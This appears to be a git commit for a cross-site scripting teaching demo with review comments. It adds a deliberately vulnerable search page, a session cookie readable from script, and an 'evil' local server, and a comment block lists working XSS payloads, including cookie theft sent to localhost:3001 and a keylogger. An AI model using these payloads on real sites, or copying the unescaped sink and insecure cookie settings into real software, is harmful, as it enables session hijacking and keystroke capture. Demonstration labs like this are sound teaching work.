Initial commit
chill117 committed Oct 19, 2016
0 parents commit 66e3a24
Showing 5 changed files with 142 additions and 0 deletions.
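--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,2 @@
+node_modules/
+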
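--- a/evil-server.js
+++ b/evil-server.js
@@ -0,0 +1,14 @@
+var express = require('express');
+var app = express();
+
+app.get('/cookie', function(req, res, next) {
+
+console.log('GET /cookie');
+console.log(req.query.cookie);
+
+res.send('Thanks!');
+});
+
+app.listen(3001, function() {
+console.log('"Evil" server listening at localhost:3001');
+});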
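Review bot: The handler on the `app.get('/cookie', ...)` line declares `next` but never calls it, and `req.query.cookie` two lines below is logged as-is even though Express's query parser can return an array or object rather than a string (repeated keys, bracket syntax), and a string value may contain newlines that break the log into forged-looking entries. Dropping the unused parameter and logging a normalized form, `console.log(JSON.stringify(req.query.cookie));`, keeps each log entry on one line and makes the receiver's behaviour predictable. A one-line header such as `// Demo receiver: logs whatever the page in public/index.html sends as ?cookie=` would also tie this file to the page it belongs to, since nothing here says why the endpoint exists.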
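--- a/package.json
+++ b/package.json
@@ -0,0 +1,17 @@
+{
+"name": "xss",
+"version": "1.0.0",
+"description": "",
+"main": "index.js",
+"dependencies": {
+"express": "4.14.0",
+"express-session": "1.14.1",
+"serve-static": "1.11.1"
+},
+"devDependencies": {},
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1"
+},
+"author": "",
+"license": "ISC"
+}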
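Review bot: `"main": "index.js"` points at a file this commit does not add; the only entry points among the five files are server.js and evil-server.js. Changing it to `"main": "server.js"` and adding `"start": "node server.js"` beside the `test` script would let `npm start` bring up the demo without reading the sources first. evil-server.js presumably needs a second script or a README line explaining that both processes must run; neither is added here.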
89 changes: 89 additions & 0 deletions public/index.html
@@ -0,0 +1,89 @@
<html>
<head>
<title>Cross-Site Scripting (XSS)</title>
</head>
<body>

<form action="">
<input type="text" name="q">
<input type="submit" value="Search">
</form>

<div id="results"></div>

<script>

/*
Proof of concept:
<img src="does-not-exist" onerror="alert(\'hi\')">
Alert session cookie:
<img src="does-not-exist" onerror="alert(document.cookie)">
Steal session cookie:
<img src="does-not-exist" onerror="var img = document.createElement(\'img\'); img.src = \'http://localhost:3001/cookie?cookie=\' + document.cookie; document.querySelector(\'body\').appendChild(img);">
Keylogger:
<img src="does-not-exist" onerror="document.querySelector(\'body\').addEventListener(\'keydown\', function(event) { console.log(event.key); });">
*/

document.addEventListener('DOMContentLoaded', function() {

var q = getQueryParameter('q');

if (q) {

search(q, function(error, results) {

showQueryAndResults(q, results);
});
}
});

function search(q, callback) {

var results = [
'Result #1',
'Result #2',
'Result #3'
];

callback(null, results);
}

function showQueryAndResults(q, results) {

var html = '';

html += '<p>Your search query:</p>';
html += '<pre>' + q + '</pre>';
html += '<ul>';

for (var i = 0; i < results.length; i++) {
html += '<li>' + results[i] + '</li>';
}

html += '</ul>';

var resultsEl = document.querySelector('#results');
resultsEl.innerHTML = html;
}

function getQueryParameter(name) {

var pairs = window.location.search.substring(1).split('&');

for (var i = 0; i < pairs.length; i++) {

var pair = pairs[i].split('=');

if (decodeURIComponent(pair[0]) === name) {
return decodeURIComponent(pair[1]);
}
}

return false;
}
</script>
</body>
</html>
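Review bot: The `html += '<pre>' + q + '</pre>';` line in showQueryAndResults is the deliberate unescaped sink that the comment block at the top of the script documents, but nothing at the sink itself says so, and a reader who lands on the function alone will file it as a bug or quietly "fix" it. A comment on that line, `// Intentional XSS sink for this demo: q is untrusted and goes into innerHTML unescaped; a real application would escape it or assign textContent.`, keeps the demo honest without changing its behaviour. Separately, getQueryParameter returns the string "undefined" for a bare `?q` because decodeURIComponent coerces the missing pair[1], which is truthy and so gets rendered, and decodeURIComponent throws an uncaught URIError on malformed percent-encoding; `return pair.length > 1 ? decodeURIComponent(pair[1]) : '';` handles the first case. The `error` argument of the search callback is also never checked before results are rendered.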
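--- a/server.js
+++ b/server.js
@@ -0,0 +1,20 @@
+var express = require('express');
+var session = require('express-session');
+var serverStatic = require('serve-static');
+var app = express();
+
+app.use(serverStatic(__dirname + '/public'));
+
+app.use(session({
+secret: 'some randomly generated secret',
+resave: true,
+saveUninitialized: true,
+cookie: {
+httpOnly: false,
+secure: false
+}
+}));
+
+app.listen(3000, function() {
+console.log('Server listening at localhost:3000');
+});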
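Review bot: `httpOnly: false` in the session cookie options is what lets the demo page read the session cookie through document.cookie, but the object carries no comment saying the setting is deliberate, and the same applies to `secure: false`. A comment above the cookie block, `// Deliberately readable from script for the XSS demo; express-session defaults to httpOnly: true and production code should keep that default.`, would stop a later maintainer from either "fixing" the demo or copying these settings into a real service. The `secret` is a hardcoded placeholder string; something like `secret: process.env.SESSION_SECRET || 'dev-only-secret'` keeps the demo runnable while signalling that a deployment must supply its own. Minor: the local is named `serverStatic` for the `serve-static` module, and `__dirname + '/public'` would conventionally be `path.join(__dirname, 'public')`.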
